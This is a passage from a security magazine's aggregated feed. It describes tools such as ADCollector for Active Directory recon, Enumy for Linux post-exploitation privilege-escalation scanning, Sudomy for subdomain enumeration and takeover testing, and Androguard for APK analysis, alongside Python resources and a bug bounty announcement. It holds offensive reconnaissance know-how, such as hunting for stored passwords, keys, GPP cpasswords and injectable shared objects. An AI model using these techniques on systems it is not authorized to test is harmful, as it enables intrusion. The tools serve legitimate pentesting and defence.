            Use LDAP over SSL/TLS

    --Spns (Default: no SPN scanning)
            Enumerate SPNs

    --Term (Default: 'pass')
            Term to search in user description field

    --Acls (Default: 'Domain object')
            Interesting ACLs on an object

Example: .\ADCollector.exe --SPNs --Term key --ACLs 'CN=Domain Admins,CN=Users,DC=lab,DC=local'

Changelog

v 1.1.1:

1. It now uses S.DS.P namespace to perform search operations, making searches faster and easier to implement. (It also supports paged search. )
2. It now supports searching in other domains. (command line parser is not implemented yet).
3. The code logic is reconstructed, less code, more understandable and cohesive.

v 1.1.2:

1. Separated into three classes.
2. Dispose ldap connection properly.
3. Enumerations: AdminSDHolder, Domain attributes(MAQ, minPwdLengthm maxPwdAge, lockOutThreshold, GP linked to the domain object), accounts don't need pre-authentication.
4. LDAP basic info (supportedLDAPVersion, supportedSASLMechanisms, domain/forest/DC Functionality)
5. SPN scanning (SPNs for MSSQL,Exchange,RDP and PS Remoting)
6. Constrained Delegation enumerations (S4U2Self, S4U2Proxy as well as Resources-based constrained delegation)
7. RODC (group that administers the RODC)

v 1.1.3:

1. Fixed SPN scanning result, privilege accounts group membership
2. Password does not expire accounts; User accounts with SPN set; 
3. Kerberos Policy
4. Interesting ACLs enumeration for the domain object, resolving GUIDs
5. DC info is back

v 1.1.4:

1. Some bugs are killed and some details are improved
2. SPN scanning is now optional
3. GPP cpassword in SYSVOL/Cache
4. Interesting ACLs on GPOs; Interesting descriptions on user objects;
5. Unusual DCSync accounts; Sensitive & not delegate accounts
6. Effective GPOs on user/computer
7. Restricted groups
8. Nested Group Membership

Project

For more information (current progress/Todo list/etc) about this tool, you can visit my project page

The post ADCollector - A lightweight tool to quickly extract valuable information from the Active Directory environment for both attacking and defending. appeared first on Hakin9 - IT Security Magazine.


List of Free Python Resources [Updated June 2020]

$
0
0

Python is considered as a beginner-friendly programming language and its community provides many free resources for beginners and more advanced users. Our team had gathered the most helpful free materials about Python. Below you will find the whole list. If we missed something, that you would like to recommend leave a comment! We will update our list!


How to start?

If you never had a chance to learn programming and that's your first experience, here you will find free books, blogs and video tutorials that will help you. 

  • Let's start with  CheersKevin short video about How to Learn to Code where he explains why it's better to think of projects you'd like to build and problems you want to solve with programming. Start working on those projects and problems rather than jumping into a specific language that's recommended to you by a friend.
  • CS for All is an open book by professors at Harvey Mudd College which teaches the fundamentals of computer science using Python. It's a perfect read for programming beginners.
  • If you've never programmed before check out Laurence Bradford blog Learn To Code with Me . She's done an incredible job of presenting the most important steps in your programming career. With her materials you will quickly understand the basics. She also have a podcast about programming, so it's worth checking!
  • Learn Python the Hard Way is a free book by Zed Shaw.
  • The Python projects tag on the Twilio blog presents many tutorials about Python and what you can create it with it. It's updated systematically.
  • A Byte of Python is a beginner's tutorial for the Python language.
  • Introduction to Programming with Python goes over the basic syntax and control structures in Python. The free book has numerous code examples.
  • Python Practice Book is a book of Python exercises to help you learn the basic language syntax.
  • Python for you and me is an approachable book with sections for Python syntax and the major language constructs. The book also contains a short guide at the end to get programmers to write their first Flask web application.
  • Automate the Boring Stuff with Python by Al Sweigart. It’s an amazing book that won't bore you. If you will like it I recommend checking other books written by Al Sweigart. They are all available for free, but you can purchase them too.
  • Program Arcade Games with Python and Pygame is another good book about Python. The bonus: it is available for free in multiple languages. 
  • Python Tutorial for Beginners: Learn Programming in 7 Days is a comprehensive guide for beginners that are looking for a step by step tutorial. This class will teach you python from basics.
  • RealPython - The website offers various materials from interactive exercises to tutorials. It's a great place for beginners.
  • Learn Python - another amazing website with tutorials prepared for the beginners. What's more, you will find tutorials for other programming languages, so you can try other options as well.
  • CodersLegacy -  an educational site created to train future generations in the art of Coding. They are not only focused on Python but on other programming languages as well. Beginner and the more advanced user will find interesting information there, as the content is divided into sections to ease the navigation. It also has a side blog where programming related articles are published.

Python for experienced users

If you already know the basics of Python or know another language this list will expand your knowledge.

  • Learn Python in y minutes provides in depth journey into the Python language. The guide is especially useful if you're coming in with previous software development experience and want to quickly grasp how the language is structured.

  • How to Develop Quality Python Code is a good material if you are planning to learn about development environments, application dependencies and project structure.
  • The Python module of the week chapters are a good way to get up to speed with the standard library. Doug Hellmann is also updating the list for changes brought about from the upgrade to Python 3 from 2.x.
  • Composing Programs shows how to build compilers with Python 3, this tutorial is especially useful, if you're looking to learn both more about the Python language and how compiles work.
  • Good to Great Python Reads this is a small collection of intermediate and advanced Python articles that focus on nuances and details of the Python language itself.
  • Mark Pilgrim created two versions of Dive Into Python, one for Python 2 and the other for 3. Both our worth checking!
  • Obey the Testing Goat is a book heavily focused on web programming with Python and how to test that, so keep that in mind.
  • TryPython is great because the website itself has a built-in Python interpreter. This means you can play around with Python coding right on the website, eliminating the need for you to muck around and install interpreters on your system.


Videos, screencasts and presentations

If you prefer to learn Python programming by watching videos then this is the resource for you. There are dozen of amazing technical tutorials, great speakers that will teach you about the Python. We narrowed the list to our favorite channels. 

  • PyVideo organizes and indexes thousands of Python videos from both major conferences and meetups.
  • Want to learn like they learn in the classroom, video tutorials is the way to go. Then you have to watch the series of Python video tutorials by theNewBoston. You get end to end coverage of Python by following these video tutorials. 
  • Sentdex created many python programming tutorials, going further than just the basics. Learn about machine learning, finance, data analysis, robotics, web development, game development and more. 
  • Programming Knowledge - it another youtube channel with amazing list of video tutorials for beginners about Python. But that's not it. In their playlist you will find tutorials about other programming languages. All in one!


Curated Python packages lists

  • awesome-python is an incredible list of Python frameworks, libraries and software. 

  • easy-python is like awesome-python although instead of just a Git repository this site is in the Read the Docs format.


Podcasts

  • Talk Python to Me focuses on the people and organizations coding on Python. Each episode features a different guest interviewee to talk about his or her work.

  • Podcast.init is another regular podcast that presents stories about Python and interviews "with the people who make it great".
  • Test and Code Podcast focuses on testing and related topics 
  • Python Bytes is a new podcast from the creators of the above mentioned "Talk Python to Me" and "Test and Code Podcast".
  • Import This is a podcast from Ken Reitz and Alex Gaynor with very in-depth interviews with influential Python community members. It's not updated as often as others, but it's still worth checking. 


Interactive  Lessons

  • Google's Python Class  - The class includes written materials, lecture videos, and lots of code exercises to practice Python coding. The call is designed to introduce Python to people who have a little programming experience. 

  • exercism.io - Exercism uses peer review to improve general programming techniques. The community there is very active, and will comment on your programming techniques. It's the best way to improve your skills and meet some amazing people.

  • Python Challenge - The Python Challenge is a game in which each level can be solved by a bit of programming. The level of difficulty can get tricky pretty quickly for beginners, but the challenges are still a very fun and useful way to test your skills. 

  • Computer Science Circles - This website teaches computer programming. This skill is very useful: with programming you can automate computer tasks, make art and music, interpret and analyze survey results, build tools for other people, create custom websites, write games, examine genetic data, connect people with each other, and the list goes on and on.
  • How to Think Like a Computer Scientist, Interactive Edition - This interactive book is a product of the Runestone Interactive Project at Luther College, led by Brad Miller and David Ranum.  The single most important skill for a computer scientist is problem solving. Problem solving means the ability to formulate problems, think creatively about solutions, and express a solution clearly and accurately. As it turns out, the process of learning to program is an excellent opportunity to practice problem solving skills. 
  • Practice Python - There are over 30 beginner Python exercises just waiting to be solved. Each exercise comes with a small discussion of a topic and a link to a solution.  Every month you will find new exercises. 
  • w3resource - w3resource.com was created aiming to be the largest online web development resource which beginners can use as a comprehensive learning resource and experienced web developers can use it a reference. 
  • Udemy - If you ever looked for the interactive, video based tutorials, you definitely heard about Udemy. The included list contains only free materials, so all you have to do is dive in and start learning Python!
  • RegexTester -  Free Online Toolbox for developers. This online tool allows you to test regular expression in JavaScript and PCRE (Python, PHP). It also allows you to generate a string example from a RegEx.

Did I miss a book or video tutorial that you recommend?

Be sure to leave a comment in the form below and let us know!

The post List of Free Python Resources [Updated June 2020] appeared first on Hakin9 - IT Security Magazine.

Enumy - Linux post exploitation privilege escalation enumeration

$
0
0

Enumy is an ultra-fast portable executable that you drop on target Linux machine during a pentest or CTF in the post-exploitation phase. Running enumy will enumerate the box for common security vulnerabilities.

Installation

You can download the final binary from the release x86 or x64 tab. Statically linked to musl Transfer the final enumy binary to the target machine.

./enumy

Who Should Use Enumy

  • Pentester can run on a target machine raisable issues for their reports.
  • CTF players can use it to identify things that they might have missed.
  • People, who are curious to know how many issues enumy finds on their local machine?

Options

$ ./enumy64 -h

 ▄█▀─▄▄▄▄▄▄▄─▀█▄  _____
 ▀█████████████▀ |   __|___ _ _ _____ _ _
     █▄███▄█     |   __|   | | |     | | |
      █████      |_____|_|_|___|_|_|_|_  |
      █▀█▀█                          |___|


------------------------------------------

Enumy - Used to enumerate the target environment and look for common
security vulnerabilities and hostspots

 -o <loc>     Save results to location
 -i <loc>     Ignore files in this directory (usefull for network shares)
 -w <loc>     Only walk files in this directory (usefull for devlopment)
 -t <num>     Threads (default 4)
 -f           Run full scans
 -s           Show missing shared libaries
 -d           Debug mode
 -h           Show help

Compilation

To compile during devlopment, make and libcap library is all that is required.

sudo apt-get install libcap-dev
make

To remove the glibc dependency and statically link all libraries/compile with musl do the following. Note to do this you will have to have docker installed to create the apline build environment.

./build.sh 64bit
./build.sh 32bit
./build.sh all
cd output

Scans That've Been Implemented

Below is the ever-growing list of scans that have been implemented.

Scan Type Quick scan Full Scan Implemented
SUID/GUID Scan ✔ ✔ ✔
File Capabilities Scan ✔ ✔ ✔
Intresting Files Scan ✔ ✔ ✔
Coredump Scan ✔ ✔ ✔
Breakout Binaries Scan ✔ ✔ ✔
SSHD Configuration Scan ✔ ✔ ✔
Sysctl Scan ✔ ✔ ✔
Living Off The Land Scan ✔ ✔ ✔
Current User Scan ✔ ✔ ✔
*.so Injection Scan ❌ ✔ ✔
Permissions Scan ❌ ✔ ❌
Docker Scan ✔ ✔ ❌
Environment Scan ✔ ✔ ❌
Privilaged Access Scan ✔ ✔ ❌
Networking Scan ✔ ✔ ❌
System Info Scan ✔ ✔ ❌
Verion Information Scan ✔ ✔ ❌
Default Weak Credentials Scan ✔ ✔ ❌
Weak Crypto Scan ❌ ✔ ❌

Scan Times

Changing the default number of threads is pretty pointless unless you're running a full scan. A full scan will do a lot more IO so more threads greatly decrease scan times. These are the scan times with a i7-8700k and 2 million files scanned. 🐂

Scan types

SUID GUID Scan

The idea of this scan is to enumerate the system looking for SUID/GUID binaries that are abnormal or have weak permissions that can be exploited.

File Capabilities Scan

Recently the Linux kernel supports capablities, this is the preferred way to give a file a subset of root's powers to mitigate risk. Although this is a much safer way of doing things, if you're lucky enough to find abnormal capabilities set on a file then it's quite possible that you can exploit the executable to gain higher access. Enumy will check the capabilities set on all executable files on the system.

Interesting Files Scan

This is more of a generic scan that will try and categorize a file-based off its contents, file extension, and file name. Enumy will look for files such as private keys, passwords, and backup files.

Coredump Scan

Coredump files are a type of ELF file that contains a process's address space when the program terminates unexpectedly. Now imagine if this process's memory was readable and contained sensitive information. Or even more exciting, this coredump could be for an internally developed tool that segfaulted, allowing you to develop a zero-day.

Breakout Binary Scan

Some files should never have SUID bit set, it quite common for a lazy sysadmin to give a file like a docker, ionice, hexdump SUID make a bash script work or there life easier. This scan tries to find some known bad SUID binaries.

Sysctl Parameter Hardening

Sysctl is used to modify kernel parameters at runtime. It's also possible to query these kernel parameters and check to see if important security measures like ASLR are enabled.

Living Off The Land scan

Living off the land is a technique used where attackers weaponize what's already on the system. They do this to remain stealthy amongst other reasons. This scan would enumerate the files that an attacker would be looking for.

Dynamic Shared Object Injection Scan

This scan will parse ELF files for their dependencies. If we have to write access to any of these dependencies or write access to any DT_RPATH and DT_RUNPATH values then we can create our own malicious shared object into that executable potentially compromising the system.

SSH Misconfiguration Scan

SSH is one of the most common services that you will find in the real world. It's also quite easy to misconfigure it. This scan will check to see if it can be hardened in any way.

Current User Scan

The current user can just parses /etc/passwd. With this information, we find root accounts, unprotected and missing home directories etc.

How To Contribute

  • If you can think of a scan idea that has not been implemented, raise it as an issue.
  • If you know how to program, make a pull request :)

Benchmarks

Scan Type Files Scanned Threads Time
Quick scan 1.8 Million 1 54 seconds
Quick scan 1.8 Million 2 26 seconds
Quick scan 1.8 Million 4 15 seconds
Quick scan 1.8 Million 6 15 seconds
Quick scan 1.8 Million 12 20 seconds
Full scan 1.8 Million 1 196 seconds
Full scan 1.8 Million 2 93 seconds
FUll scan 1.8 Million 4 47 seconds
Full scan 1.8 Million 6 30 seconds
Full scan 1.8 Million 12 29 seconds

More: https://github.com/luke-goddard/enumy

The post Enumy - Linux post exploitation privilege escalation enumeration appeared first on Hakin9 - IT Security Magazine.

Androguard - Python tool to play with Android files

$
0
0

Androguard is a full python tool to play with Android files. It is designed to work with Python 3 only.

  • DEX, ODEX
  • APK
  • Android’s binary XML
  • Android resources
  • Disassemble DEX/ODEX bytecodes
  • Decompiler for DEX/ODEX files

You can either use the CLI or graphical frontend for androguard, or use androguard purely as a library for your own tools and scripts.

Authors: Androguard Team

Androguard + tools: Anthony Desnos (desnos at t0t0.fr).

DAD (DAD is A Decompiler): Geoffroy Gueguen (geoffroy dot gueguen at gmail dot com)

Installation

There are several ways how to install androguard.

Before you start, make sure you are using a supported python version! For Windows, we recommend using the Anaconda python 3.6.x package.

Warning: The magic library might not work out of the box. If your magic library does not work, please refer to the installation instructions of python-magic.

PIP

The usual way to install python packages is by using pypi.python.org and it’s package installer pip. Just use:

$ pip install -U androguard[magic,GUI]

to install androguard including the GUI and magic file type detection. In order to use features that use dot, you need Graphviz installed. This is not a python dependency but a binary package! Please follow the installation instructions for GraphvizInstall.

You can also make use of an virtualenv, to separate the installation from your system-wide packages:

$ virtualenv venv-androguard
$ source venv-androguard/bin/activate
$ pip install -U androguard[magic,GUI]

pip should install all required packages too.

Debian / Ubuntu

Debian has androguard in its repository. You can just install it using apt install androguard. All required dependencies are automatically installed.

Install from Source

Use git to fetch the sources, then install it. Please install git and python on your own. Androguard requires Python at least 3.4 to work. Pypy >= 5.9.0 should work as well but is not tested.

$ git clone --recursive https://github.com/androguard/androguard.git
$ cd androguard
$ virtualenv -p python3 venv-androguard
$ source venv-androguard/bin/activate
$ pip install .[magic,GUI]

The dependencies, defined in setup.py will be automatically installed.

For development purposes, you might want to install the extra dependencies for docs and tests as well:

$ git clone --recursive https://github.com/androguard/androguard.git
$ cd androguard
$ virtualenv -p python3 venv-androguard
$ source venv-androguard/bin/activate
$ pip install -e .[magic,GUI,tests,docs]

You can then create a local copy of the documentation:

$ python3 setup.py build_sphinx

Which is generated in build/sphinx/html.

Getting Started

Using Androguard tools

There are already some tools for specific purposes.

To just decode the AndroidManifest.xml or resources.arsc, there are androguard axml and androguard arsc. To get information about the certificates use androguard sign.

If you want to create call graphs, use androguard cg, or if you want control flow graphs, you can use androguard decompile.

Using Androlyze and the python API

The easiest way to analyze APK files is by using androguard analyze. It will start an iPython shell and has all modules loaded to get into action.

For analyzing and loading APK or DEX files, some wrapper functions exist. Use AnalyzeAPK(filename) or AnalyzeDEX(filename) to load a file and start analyzing it. There are already plenty of APKs in the androguard repo, you can either use one of those or start your own analysis.

$ androguard analyze
Androguard version 3.1.1 started
In [1]: a, d, dx = AnalyzeAPK("examples/android/abcore/app-prod-debug.apk")
# Depending on the size of the APK, this might take a while...

In [2]:

The three objects you get are a an APK object, d an array of DalvikVMFormat object and dx an Analysis object.

Inside the APK object, you can find all information about the APK, like the package name, permissions, the AndroidManifest.xml, or its resources.

The DalvikVMFormat corresponds to the DEX file found inside the APK file. You can get classes, methods, or strings from the DEX file. But when using multi-DEX APK’s it might be a better idea to get those from another place. The Analysis object should be used instead, as it contains special classes, which link information about the classes.dex and can even handle many DEX files at once.

Getting Information about an APK

If you have successfully loaded your APK using AnalyzeAPK, you can now start getting information about the APK.

For example, getting the permissions of the APK:

In [2]: a.get_permissions()
Out[2]:
['android.permission.INTERNET',
 'android.permission.WRITE_EXTERNAL_STORAGE',
 'android.permission.ACCESS_WIFI_STATE',
 'android.permission.ACCESS_NETWORK_STATE']

or getting a list of all activities, which are defined in the AndroidManifest.xml:

In [3]: a.get_activities()
Out[3]:
['com.greenaddress.abcore.MainActivity',
 'com.greenaddress.abcore.BitcoinConfEditActivity',
 'com.greenaddress.abcore.AboutActivity',
 'com.greenaddress.abcore.SettingsActivity',
 'com.greenaddress.abcore.DownloadSettingsActivity',
 'com.greenaddress.abcore.PeerActivity',
 'com.greenaddress.abcore.ProgressActivity',
 'com.greenaddress.abcore.LogActivity',
 'com.greenaddress.abcore.ConsoleActivity',
 'com.greenaddress.abcore.DownloadActivity']

Get the package name, app name, and path of the icon:

In [4]: a.get_package()
Out[4]: 'com.greenaddress.abcore'

In [5]: a.get_app_name()
Out[5]: u'ABCore'

In [6]: a.get_app_icon()
Out[6]: u'res/mipmap-xxxhdpi-v4/ic_launcher.png'

Get the numeric version and the version string, and the minimal, maximal, target and effective SDK version:

In [7]: a.get_androidversion_code()
Out[7]: '2162'

In [8]: a.get_androidversion_name()
Out[8]: '0.62'

In [9]: a.get_min_sdk_version()
Out[9]: '21'

In [10]: a.get_max_sdk_version()

In [11]: a.get_target_sdk_version()
Out[11]: '27'

In [12]: a.get_effective_target_sdk_version()
Out[12]: 27

You can even get the decoded XML for the AndroidManifest.xml:

In [15]: a.get_android_manifest_axml().get_xml()
Out[15]: '<manifest xmlns:android="http://schemas.android.com/apk/res/android" android:versionCode="2162" android:versionName="0.62" package="com.greenaddress.abcore">\n<uses-sdk android:minSdkVersion="21" android:targetSdkVersion="27">\n</uses-sdk>\n<uses-permission android:name="android.permission.INTERNET">\n</uses-permission>\n<uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE">\n</uses-permission>\n<uses-permission android:name="android.permission.ACCESS_WIFI_STATE">\n</uses-permission>\n<uses-permission android:name="android.permission.ACCESS_NETWORK_STATE">\n</uses-permission>\n<application android:theme="@7F0F0006" android:label="@7F0E001D" android:icon="@7F0D0000" android:debuggable="true" android:allowBackup="false" android:supportsRtl="true">\n<activity android:name="com.greenaddress.abcore.MainActivity">\n<intent-filter>\n<action android:name="android.intent.action.MAIN">\n</action>\n<category android:name="android.intent.category.LAUNCHER">\n</category>\n</intent-filter>\n</activity>\n<service android:name="com.greenaddress.abcore.DownloadInstallCoreIntentService" android:exported="false">\n</service>\n<service android:name="com.greenaddress.abcore.RPCIntentService" android:exported="false">\n</service>\n<service android:name="com.greenaddress.abcore.ABCoreService" android:exported="false">\n</service>\n<activity android:name="com.greenaddress.abcore.BitcoinConfEditActivity">\n<intent-filter>\n<category android:name="android.intent.category.DEFAULT">\n</category>\n<action android:name="com.greenaddress.abcore.BitcoinConfEditActivity">\n</action>\n</intent-filter>\n</activity>\n<activity android:name="com.greenaddress.abcore.AboutActivity">\n</activity>\n<activity android:label="@7F0E0038" android:name="com.greenaddress.abcore.SettingsActivity" android:noHistory="true">\n</activity>\n<activity android:label="@7F0E0035" android:name="com.greenaddress.abcore.DownloadSettingsActivity" android:noHistory="true">\n</activity>\n<activity android:theme="@7F0F0006" android:label="@7F0E0036" android:name="com.greenaddress.abcore.PeerActivity">\n</activity>\n<activity android:theme="@7F0F0006" android:label="@7F0E0037" android:name="com.greenaddress.abcore.ProgressActivity">\n</activity>\n<activity android:name="com.greenaddress.abcore.LogActivity">\n</activity>\n<activity android:name="com.greenaddress.abcore.ConsoleActivity">\n</activity>\n<activity android:name="com.greenaddress.abcore.DownloadActivity">\n</activity>\n<receiver android:name="com.greenaddress.abcore.PowerBroadcastReceiver">\n<intent-filter>\n<action android:name="android.intent.action.ACTION_POWER_CONNECTED">\n</action>\n<action android:name="android.intent.action.ACTION_POWER_DISCONNECTED">\n</action>\n<action android:name="android.intent.action.ACTION_SHUTDOWN">\n</action>\n<action android:name="android.intent.action.ACTION_BATTERY_LOW">\n</action>\n<action android:name="android.net.wifi.STATE_CHANGE">\n</action>\n</intent-filter>\n</receiver>\n</application>\n</manifest>\n'

Or if you like to use the AndroidManifest.xml as an ElementTree object, use the following method:

In [13]: a.get_android_manifest_xml()
Out[13]: <Element manifest at 0x7f9d01587b00>

There are many more methods to explore, just take a look at the API for APK.

Using the Analysis object

The ~androguard.core.analysis.analysis.Analysis the object has all information about the classes, methods, fields and strings inside one or multiple DEX files.

Additionally, it enables you to get call graphs and crossreferences (XREFs) for each method, class, field and string.

This means you can investigate the application for certain API calls or create graphs to see the dependencies of different classes.

As a first example, we will get all classes from the Analysis:

In [2]: dx.get_classes()
Out[2]:
[<analysis.ClassAnalysis Ljava/io/FileNotFoundException; EXTERNAL>,
 <analysis.ClassAnalysis Landroid/content/SharedPreferences; EXTERNAL>,
 <analysis.ClassAnalysis Landroid/support/v4/widget/FocusStrategy$BoundsAdapter;>,
 <analysis.ClassAnalysis Landroid/support/v4/media/MediaBrowserCompat$MediaBrowserServiceCallbackImpl;>,
 <analysis.ClassAnalysis Landroid/support/transition/WindowIdImpl;>,
 <analysis.ClassAnalysis Landroid/media/MediaMetadataEditor; EXTERNAL>,
 <analysis.ClassAnalysis Landroid/support/v4/app/BundleCompat$BundleCompatBaseImpl;>,
 <analysis.ClassAnalysis Landroid/support/transition/MatrixUtils$1;>,
 <analysis.ClassAnalysis Landroid/support/v7/widget/ShareActionProvider;>,
 ...

As you can see, get_classes() returns a list of ClassAnalysis objects. Some of them are marked as EXTERNAL, which means that the source code of this class is not defined within the DEX files that are loaded inside the Analysis. For example the first class java.io.FileNotFoundException is an API class.

A ClassAnalysis does not contain the actual code but the ClassDefItem can be loaded using theget_vm_class():

In [5]: dx.get_classes()[2].get_vm_class()
Out[5]: <dvm.ClassDefItem Ljava/lang/Object;->Landroid/support/v4/widget/FocusStrategy$BoundsAdapter;>

If the class is EXTERNAL, a ExternalClass is returned instead.

The ClassAnalysis also contains all the information about XREFs, which are explained in more detail in the next section.

XREFs

Consider the following Java source code:

class Foobar {
    public int afield = 23;

    public void somemethod() {
        String astring = "hello world";
    }
}

class Barfoo {
    public void othermethod() {
        Foobar x = new Foobar();

        x.somemethod();

        System.out.println(x.afield);
    }
}

There are two classes and the class Barfoo instantiates the other class Foobar as well as calling methods and reading fields.

XREFs are generated for four things:

  • Classes
  • Methods
  • Fields
  • Strings

XREFs work in two directions: xref_from and xref_to. To means, that the current object is calling another object. From means, that the current object is called by another object.

All XREFs can be visualized as a directed graph and if some object A is contained in the xref_to, the called object will contain A in their xref_from.

In the case of our Java example, the string astring is called in Foobar.somethod, therefore it will be contained in the xref_to of Foobar.somethod.

The Field afield will be contained in the xref_to of Barfoo.othermethod as well as the call to Foobar.somethod.

More on XREFs can be found in xrefs.

Documentation

Find the documentation for master on ReadTheDocs.

There are some (probably broken/outdated) examples and demos in the folders demos and examples.

Projects using Androguard

In alphabetical order

You are using Androguard and are not listed here? Just create a ticket or send us a pull request with your project!

The post Androguard - Python tool to play with Android files appeared first on Hakin9 - IT Security Magazine.

France's COVID-19 contact tracing app is now tested by 15,000+ ethical hackers

$
0
0

Second step for France’s COVID-19 contact tracing app which goes on a public Bug Bounty programme.

Paris – June, 3rd,2020 - YesWeHack, Europe’s Bug Bounty leader, announced the beginning of a public Bug Bounty programme for StopCovid, France’s official app in the fight against the spread of COVID-19. From today, the 15,000+ ethical hackers of the YesWehack platform, spread in more than 120 countries, will be enabled to search for vulnerabilities in the application.

The public bug bounty programme follows a week-long private one where 35 European ethical hackers investigated all components of the app. As StopCovid goes to end users, the public bug bounty programme opens up. France is the first country to ensure continuous security for its contact tracing app through bug bounty.

A few minor bugs were discovered during the private phase

All the vulnerabilities identified were reported to the StopCovid project team. Out of the 12 bugs identified in the YesWeHack program, 7 were accepted as being within the scope of the Bug Bounty or being of general interest: 5 minor to moderate security bugs, not allowing any immediate compromising of phones, infrastructure or data generated by the application, and 2 functional bugs. Corrections are underway and all accepted bugs have been reported on Inria’s Gitlab, the StopCovid project team’s bug tracker.

Public phase: strengthen the vulnerability hunt

StopCovid is officially accessible to all in France starting 2 June. According to the timeline set between the StopCovid consortium and YesWeHack, the public bug bounty programme opens on the same date. The vulnerability hunt is thus accessible to the 15,000-plus ethical hackers of the YesWeHack platform. Hackers from around the world will thus be able to help France strengthen the security of its application. The programme rules and perimeters are adapted accordingly.

With this second step, the StopCovid project team underlines the crucial role of crowdsourced security for data protection in the fight against COVID-19 – and how bug bounty can help build trust and transparency. Check-out the public programme here.

About YesWeHack

Founded in 2013, YesWeHack is the #1 European Bug Bounty & VDP Platform. YesWeHack offers companies an innovative approach to cybersecurity with Bug Bounty (pay-per-vulnerability discovered), connecting more than 15,000 cyber-security experts (ethical hackers) across 120 countries with organisations to secure their exposed scopes and reporting vulnerabilities in their websites, mobile apps, infrastructure and connected devices. YesWeHack runs private (invitation-only) programmes, public programmes and vulnerability disclosure policies (VDP) for hundreds of worldwide organisations in compliance with the strictest European regulations.

The post France's COVID-19 contact tracing app is now tested by 15,000+ ethical hackers appeared first on Hakin9 - IT Security Magazine.

Sudomy - Subdomain Enumeration and Analysis Tool

$
0
0

Sudomy is a subdomain enumeration tool, created using a bash script, to analyze domains and collect subdomains in a fast and comprehensive way.

Features

For a recent time, Sudomy has these 13 features:

  • Easy, light, fast, and powerful. A bash script is available by default in almost all Linux distributions. By using the bash script multiprocessing feature, all processors will be utilized optimally.
  • Subdomain enumeration process can be achieved by using active method or passive method
    • Active Method
      • Sudomy utilizes Gobuster tools because of its highspeed performance in carrying out the DNS Subdomain Bruteforce attack (wildcard support). The wordlist that is used comes from combined SecList (Discover/DNS) lists which contain around 3 million entries
    • Passive Method
      • By selecting good third-party sites, the enumeration process can be optimized. More results will be obtained with less time required. Sudomy can collect data from these well-curated 20 third-party sites:
          https://dnsdumpster.com
          https://web.archive.org
          https://shodan.io
          https://virustotal.com
          https://crt.sh
          https://www.binaryedge.io
          https://securitytrails.com
          https://sslmate.com/certspotter
          https://censys.io
          https://threatminer.org
          http://dns.bufferover.run
          https://hackertarget.com
          
          https://www.threatcrowd.org
          https://riddler.io
          https://findsubdomains.com
          https://rapiddns.io/
          https://otx.alienvault.com/
          https://index.commoncrawl.org/
          https://urlscan.io/
        
  • Test the list of collected subdomains and probe for working HTTP or https servers. This feature uses a third-party tool, httprobe.
  • Subdomain availability test based on Ping Sweep and/or by getting HTTP status code.
  • The ability to detect virtual host (several subdomains which resolve to single IP Address). Sudomy will resolve the collected subdomains to IP addresses, then classify them if several subdomains resolve to a single IP address. This feature will be very useful for the next penetration testing/bug bounty process. For instance, in port scanning, single IP address won’t be scanned repeatedly
  • Performed port scanning from collected subdomains/virtualhosts IP Addresses
  • Testing Subdomain TakeOver attack
  • Taking Screenshots of subdomains
  • Identify technologies on websites
  • Data Collecting/Scraping open port from 3rd party (Default::Shodan), For right now just using Shodan [Future::Censys,Zoomeye]. More efficient and effective to collecting port from list ip on target [[ Subdomain > IP Resolver > Crawling > ASN & Open Port ]]
  • Collecting Juicy URL & Extract URL Parameter ( Resource Default::WebArchive, CommonCrawl, UrlScanIO)
  • Define the path for outputfile (specify an output file when completed)
  • Report output in HTML & CSV format

How Sudomy Works

Sudomy is using cURL library in order to get the HTTP Response Body from third-party sites to then execute the regular expression to get subdomains. This process fully leverages multi processors, more subdomains will be collected with less time consumption.

Publication

User Guide

Comparison

The following are the results of passive enumeration DNS testing of Sublist3r, Subfinder, and Sudomy. The domain that is used in this comparison is bugcrowd.com.


More: https://github.com/Screetsec/Sudomy

The post Sudomy - Subdomain Enumeration and Analysis Tool appeared first on Hakin9 - IT Security Magazine.

Flash Framework - a high performance, open source web application framework for hackers

$
0
0

Flash is a high performance, open-source web application framework. Flash web framework follows the MVT (Model-View-Template) architectural pattern or you can say MVC (Model-View-Controller) pattern because the controller is handle by the system. Flash is fast, lightweight, powerful, simple, and easy to use.

It allows users to create web applications in an easy and simplest way, in the framework users can create their own services and library.

Features

  • Fast and powerful web framework.
  • Extremely Light Weight.
  • MVT Architecture.
  • You can build RESTful APIs faster.
  • Security and XSS Filtering.
  • Simple and easy to learn.
  • Easy to deploy on any server.

Flash architecture

Flash web framework based on MVT (Model-View-Template) architecture. The MVT (Model-View-Template) is a software design pattern. The Model helps to handle database. It is a data access layer that handles the database. The Template is a presentation layer that handles the User Interface part. The View is used to execute the business logic and interact with a model to carry data and renders a template.

Directory Structure of Flash

/system
/application
    /app
        /templates
        /models.php
        /views.php
        /urls.php
    /app1
    /app..n
    /templates
    /settings.php
    /urls.php
/.htaccess
/index.php

System directory

System directory is the main system directory of the framework, where all the system files are stored.

Application directory

Application is the main project directory that contains all your apps and project files. you can change this default application directory to a different location, set the new APP_DIR path in index.php to change the default application directory. All your app project files (settings, URLs) should be inside the application directory.

App directory

The app is a demo application of your project. You can create new apps like login, admin, news, blogs, or any app that you want. your app directory contains views, models, and URLs files.

Templates directory

The templates directory contains all your HTML template files.

Installation

Flash web framework is for PHP, so it requires PHP 5.6 or newer. now you won’t need to setup anything just yet.

Flash can be installed in few steps:

  • Download the files.
  • Unzip the package.
  • Upload all the Flash folders and files (application, system, .htaccess, index.php) on the server.
  /public_html
      /application
      /system
      .htaccess
      index.php

That's it, in the web framework, there is nothing to configure and setup. it's always ready to go.

For Linux

A quick setup for Linux and Android devices.

$ git clone https://github.com/rajkumardusad/flash
$ cd flash
$ php -S localhost:8080 index.php

That's it, in the Flash web framework, there is nothing to configure and setup. it's always ready to go.

Simple Example

A simple Hello, World web application in the Flash web framework.

Create View

Let’s write the first view. Open the app/views.php file and put the following PHP code in it:

class view extends Views {

  function __construct() {
    parent::__construct();
  }

  function hello_world() {
    return $this->response("hello, world !!");
  }
}

Hello world view is created now map this view with URLs.

Map URLs with Views

Let's create a URL and map with views. open app/urls.php file and put the following code in it:

//include views to route URLs
require_once("views.php");

$urlpatterns=[
  '/' => 'view.hello_world',
];

Now a simple hello world web app is created.

Documentation


More: https://github.com/rajkumardusad/flash

The post Flash Framework - a high performance, open source web application framework for hackers appeared first on Hakin9 - IT Security Magazine.

Bypassing WAFs with WAFNinja [FREE COURSE CONTENT]

$
0
0

